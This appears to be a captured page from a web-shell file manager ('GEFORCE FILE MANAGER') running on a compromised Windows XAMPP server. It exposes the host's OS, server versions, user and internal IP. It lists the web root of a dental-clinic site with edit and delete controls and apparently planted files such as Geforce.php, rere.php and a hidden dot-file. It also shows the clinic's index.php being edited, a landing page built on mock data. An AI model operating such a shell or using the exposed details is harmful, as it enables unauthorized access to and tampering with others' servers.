[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 administrator
SET
[ DEL ]
📁 api
SET
[ DEL ]
📁 backup
SET
[ DEL ]
📁 bin
SET
[ DEL ]
📁 cache
SET
[ DEL ]
📁 cli
SET
[ DEL ]
📁 components
SET
[ DEL ]
📁 images
SET
[ DEL ]
📁 includes
SET
[ DEL ]
📁 language
SET
[ DEL ]
📁 latest2022
SET
[ DEL ]
📁 layouts
SET
[ DEL ]
📁 libraries
SET
[ DEL ]
📁 media
SET
[ DEL ]
📁 modules
SET
[ DEL ]
📁 plugins
SET
[ DEL ]
📁 project
SET
[ DEL ]
📁 templates
SET
[ DEL ]
📁 test
SET
[ DEL ]
📁 test1
SET
[ DEL ]
📁 tmp
SET
[ DEL ]
📁 videos
SET
[ DEL ]
📄 .20bd32d4
2,700 B
SET
[ EDIT ]
|
[ DEL ]
📄 Geforce.php
12,664 B
SET
[ EDIT ]
|
[ DEL ]
📄 LICENSE.txt
18,092 B
SET
[ EDIT ]
|
[ DEL ]
📄 README.txt
4,942 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
14,849 B
SET
[ EDIT ]
|
[ DEL ]
📄 rere.php
14,292 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: index.php
<?php // index.php - Al Ajaji Dental Center $siteName = "Al Ajaji Dental"; $currentYear = date("Y"); // Mock Data for Doctors/Clinics (Glassdoor/Directory style) $clinics = [ ["name" => "Riyadh Olaya", "rating" => "4.9", "reviews" => "120", "specialty" => "General & Cosmetic"], ["name" => "Jeddah Branch", "rating" => "4.8", "reviews" => "85", "specialty" => "Orthodontics"], ["name" => "Dammam Center", "rating" => "4.7", "reviews" => "210", "specialty" => "Pediatric Dentistry"] ]; ?> <!DOCTYPE html> <html lang="en" dir="ltr" class="scroll-smooth"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title><?php echo $siteName; ?> | Premier Dental Care & Specialized Services</title> <script src="https://cdn.tailwindcss.com"></script> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800&display=swap" rel="stylesheet"> <script> tailwind.config = { theme: { extend: { fontFamily: { sans: ['"Plus Jakarta Sans"', 'sans-serif'], }, colors: { medicalBlue: '#005596', medicalTeal: '#00a8b5', glassGray: '#f0f2f5', } } } } </script> <style> .hero-pattern { background-color: #ffffff; background-image: radial-gradient(#005596 0.5px, transparent 0.5px); background-size: 24px 24px; } .glass-card { background: rgba(255, 255, 255, 0.9); backdrop-filter: blur(10px); border: 1px solid rgba(0, 0, 0, 0.05); } </style> </head> <body class="bg-white text-slate-900 font-sans antialiased"> <nav class="sticky top-0 z-50 bg-white/80 backdrop-blur-md border-b border-slate-100"> <div class="max-w-7xl mx-auto px-4 h-20 flex justify-between items-center"> <div class="flex items-center gap-8"> <a href="#" class="flex items-center gap-2"> <div class="w-10 h-10 bg-medicalBlue rounded-lg flex items-center justify-center text-white"> <i class="fa-solid fa-tooth text-xl"></i> </div> <span class="text-2xl font-extrabold tracking-tight text-medicalBlue uppercase"><?php echo $siteName; ?></span> </a> <div class="hidden lg:flex items-center space-x-6 text-sm font-semibold text-slate-600"> <a href="#" class="hover:text-medicalBlue border-b-2 border-transparent hover:border-medicalBlue py-7 transition">Clinics</a> <a href="#" class="hover:text-medicalBlue border-b-2 border-transparent hover:border-medicalBlue py-7 transition">Specialists</a> <a href="#" class="hover:text-medicalBlue border-b-2 border-transparent hover:border-medicalBlue py-7 transition">Patient Resources</a> <a href="#" class="hover:text-medicalBlue border-b-2 border-transparent hover:border-medicalBlue py-7 transition">Medical Journal</a> </div> </div> <div class="flex items-center gap-4"> <a href="#" class="hidden md:block text-sm font-bold text-slate-700">Arabic / العربية</a> <button class="bg-medicalBlue text-white px-6 py-2.5 rounded-full font-bold text-sm hover:shadow-lg hover:shadow-medicalBlue/30 transition"> Book Appointment </button> </div> </div> </nav> <header class="hero-pattern py-24 border-b border-slate-100"> <div class="max-w-5xl mx-auto px-4 text-center"> <h1 class="text-4xl md:text-6xl font-extrabold tracking-tight mb-8 text-slate-900"> Find the right <span class="text-medicalBlue">Dental Specialist</span> for you. </h1> <div class="glass-card p-2 rounded-2xl shadow-2xl flex flex-col md:flex-row gap-2 mb-8"> <div class="flex-1 flex items-center px-4 py-3 gap-3 border-b md:border-b-0 md:border-r border-slate-200"> <i class="fa-solid fa-user-doctor text-slate-400"></i> <input type="text" placeholder="Service (e.g. Implant, Root Canal)" class="w-full bg-transparent outline-none text-sm font-medium"> </div> <div class="flex-1 flex items-center px-4 py-3 gap-3"> <i class="fa-solid fa-location-dot text-slate-400"></i> <input type="text" placeholder="Location (Riyadh, Jeddah...)" class="w-full bg-transparent outline-none text-sm font-medium"> </div> <button class="bg-medicalTeal text-white px-10 py-4 rounded-xl font-bold hover:bg-teal-600 transition"> Search Clinics </button> </div> <p class="text-slate-500 font-medium">Trusted by over 500,000+ patients across the Kingdom.</p> </div> </header> <section class="py-12 bg-slate-50 border-b border-slate-200"> <div class="max-w-7xl mx-auto px-4 grid grid-cols-2 lg:grid-cols-4 gap-8"> <div class="flex items-center gap-4"> <i class="fa-solid fa-award text-3xl text-medicalBlue"></i> <div> <div class="font-bold text-xl">JCIA Accredited</div> <div class="text-xs text-slate-500 uppercase font-bold tracking-widest">Global Standards</div> </div> </div> <div class="flex items-center gap-4"> <i class="fa-solid fa-microscope text-3xl text-medicalBlue"></i> <div> <div class="font-bold text-xl">Scientific Excellence</div> <div class="text-xs text-slate-500 uppercase font-bold tracking-widest">Research Driven</div> </div> </div> <div class="flex items-center gap-4"> <i class="fa-solid fa-shield-halved text-3xl text-medicalBlue"></i> <div> <div class="font-bold text-xl">Insurance Accepted</div> <div class="text-xs text-slate-500 uppercase font-bold tracking-widest">All Major Providers</div> </div> </div> <div class="flex items-center gap-4"> <i class="fa-solid fa-clock-rotate-left text-3xl text-medicalBlue"></i> <div> <div class="font-bold text-xl">24/7 Emergency</div> <div class="text-xs text-slate-500 uppercase font-bold tracking-widest">Round the Clock</div> </div> </div> </div> </section> <section class="py-20 max-w-7xl mx-auto px-4"> <div class="flex justify-between items-end mb-12"> <div> <h2 class="text-3xl font-bold mb-2">Our Specialized Centers</h2> <p class="text-slate-500">Explore branches with the highest patient satisfaction ratings.</p> </div> <a href="#" class="text-medicalBlue font-bold underline underline-offset-4">View All Branches</a> </div> <div class="grid grid-cols-1 md:grid-cols-3 gap-6"> <?php foreach($clinics as $clinic): ?> <div class="border border-slate-200 rounded-2xl p-6 hover:shadow-xl transition group cursor-pointer"> <div class="flex justify-between items-start mb-4"> <div class="w-12 h-12 bg-slate-100 rounded-xl flex items-center justify-center text-medicalBlue group-hover:bg-medicalBlue group-hover:text-white transition"> <i class="fa-solid fa-hospital text-xl"></i> </div> <div class="flex items-center gap-1 bg-green-100 text-green-700 px-2 py-1 rounded text-xs font-bold"> <?php echo $clinic['rating']; ?> <i class="fa-solid fa-star"></i> </div> </div> <h3 class="text-xl font-bold mb-1"><?php echo $clinic['name']; ?></h3> <p class="text-sm text-slate-500 mb-4"><?php echo $clinic['specialty']; ?></p> <div class="flex items-center gap-2 text-xs text-slate-400 font-semibold mb-6"> <i class="fa-solid fa-message"></i> <?php echo $clinic['reviews']; ?> Verified Reviews </div> <button class="w-full py-3 rounded-lg border-2 border-slate-100 font-bold group-hover:border-medicalBlue group-hover:text-medicalBlue transition"> Clinic Profile </button> </div> <?php endforeach; ?> </div> </section> <section class="py-24 bg-medicalBlue text-white relative overflow-hidden"> <div class="max-w-7xl mx-auto px-4 grid grid-cols-1 lg:grid-cols-2 gap-16 items-center"> <div> <span class="bg-white/10 px-3 py-1 rounded text-xs font-bold uppercase tracking-[0.2em]">Scientific Leadership</span> <h2 class="text-4xl md:text-5xl font-bold mt-6 mb-8 leading-tight">Advancing Dentistry through Research.</h2> <p class="text-blue-100 text-lg mb-10 leading-relaxed font-light"> Al Ajaji Dental Center is more than a clinic; it is a center of excellence. We publish monthly dental insights and clinical studies to ensure our patients receive the most advanced treatments available. </p> <div class="flex gap-4"> <button class="bg-white text-medicalBlue px-8 py-3 rounded-full font-bold hover:bg-blue-50 transition">Read Journal</button> <button class="border border-white/30 px-8 py-3 rounded-full font-bold hover:bg-white/10 transition">Academic Partnerships</button> </div> </div> <div class="relative"> <div class="absolute -top-10 -right-10 w-64 h-64 bg-medicalTeal/20 rounded-full blur-3xl"></div> <img src="https://images.unsplash.com/photo-1579684385127-1ef15d508118?q=80&w=1000" alt="Medical Research" class="rounded-3xl shadow-2xl border border-white/10 relative z-10"> </div> </div> </section> <section class="py-20 bg-glassGray"> <div class="max-w-4xl mx-auto px-4 bg-white rounded-[2rem] p-12 text-center shadow-lg"> <h2 class="text-3xl font-extrabold mb-4">Join our world-class medical team</h2> <p class="text-slate-500 mb-8">Discover why we are rated the #1 Dental Employer in Saudi Arabia for three consecutive years.</p> <div class="flex flex-col sm:flex-row justify-center gap-4"> <a href="#" class="bg-slate-900 text-white px-10 py-3 rounded-xl font-bold">Search Jobs</a> <a href="#" class="bg-white border border-slate-200 text-slate-900 px-10 py-3 rounded-xl font-bold hover:bg-slate-50 transition">See Employee Reviews</a> </div> </div> </section> <footer class="bg-white pt-20 pb-10 border-t border-slate-200"> <div class="max-w-7xl mx-auto px-4"> <div class="grid grid-cols-1 md:grid-cols-4 gap-12 mb-16"> <div class="col-span-1 md:col-span-1"> <span class="text-2xl font-black text-medicalBlue mb-6 block tracking-tighter uppercase"><?php echo $siteName; ?></span> <p class="text-sm text-slate-500 leading-relaxed italic"> Leading the transformation of dental healthcare in Saudi Arabia through technology, research, and patient-centered care. </p> </div> <div> <h4 class="font-bold text-slate-900 mb-6 uppercase text-xs tracking-widest">Quick Links</h4> <ul class="space-y-3 text-sm text-slate-600"> <li><a href="#" class="hover:text-medicalBlue transition">Find a Specialist</a></li> <li><a href="#" class="hover:text-medicalBlue transition">Dental Services</a></li> <li><a href="#" class="hover:text-medicalBlue transition">Insurance Partners</a></li> <li><a href="#" class="hover:text-medicalBlue transition">International Patients</a></li> </ul> </div> <div> <h4 class="font-bold text-slate-900 mb-6 uppercase text-xs tracking-widest">Academic</h4> <ul class="space-y-3 text-sm text-slate-600"> <li><a href="#" class="hover:text-medicalBlue transition">Medical Journal</a></li> <li><a href="#" class="hover:text-medicalBlue transition">CME Programs</a></li> <li><a href="#" class="hover:text-medicalBlue transition">Resident Training</a></li> <li><a href="#" class="hover:text-medicalBlue transition">Case Studies</a></li> </ul> </div> <div> <h4 class="font-bold text-slate-900 mb-6 uppercase text-xs tracking-widest">Connect</h4> <p class="text-sm text-slate-600 mb-4">info@alajajidental.com</p> <div class="flex gap-4"> <a href="#" class="text-medicalBlue text-xl"><i class="fa-brands fa-linkedin"></i></a> <a href="#" class="text-medicalBlue text-xl"><i class="fa-brands fa-x-twitter"></i></a> <a href="#" class="text-medicalBlue text-xl"><i class="fa-brands fa-instagram"></i></a> </div> </div> </div> <div class="pt-8 border-t border-slate-100 flex flex-col md:flex-row justify-between items-center text-[10px] text-slate-400 uppercase tracking-widest"> <span>© <?php echo $currentYear; ?> <?php echo $siteName; ?>. Licensed by Saudi Ministry of Health.</span> <span class="mt-4 md:mt-0 flex gap-6"> <a href="#">Privacy Policy</a> <a href="#">Terms of Use</a> </div> </div> </div> </footer> </body> </html>